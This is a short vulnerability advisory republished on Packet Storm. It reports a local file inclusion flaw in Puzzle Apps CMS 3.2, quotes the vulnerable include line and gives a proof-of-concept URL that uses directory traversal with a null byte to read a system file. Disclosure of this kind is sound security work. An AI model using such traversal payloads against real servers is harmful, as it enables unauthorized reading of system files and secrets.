Puzzle Apps CMS version 3.2 suffers from a local file inclusion vulnerability.
6d2efad599342b5af563d8a1a79db973c417e849a4fe79b9d7a34b7a1f635ec2# ------------------------------------------------------------------------
# Software................ Puzzle Apps CMS 3.2
# Vulnerability........... Local File Inclusion
# Site.................... http://www.puzzleapps.org/
# Download Link........... http://sourceforge.net/projects/puzzlecms/files/puzzlecms/Puzzle Apps CMS 3.2/puzzle-3.2.tar.gz/download
# Discovery Date.......... 5/29/2011
# Tested On............... Windows XPsp2 + WAMP
# ------------------------------------------------------------------------
# Author.................. Treasure Priyamal
# Site.................... http://www.treasuresec.com/
# Email................... Treasure Priyamal <treasure@treasuresec.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# In Puzzle App CMS there are couple of the places you will be able to find
# LFI vulns.
#
#
# -- Vulnerable Source
# include_once ($COREROOT . "config/loader.config.php");
#
# --Sample to LFI--
#
#http://localhost/puzzle/core/config.loader.php?COREROOT=[LFI]
#
#
# --PoC LFI --
#
#http://localhost/puzzle/core/config.loader.php?COREROOT=../../../boot.ini%00
#
#
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed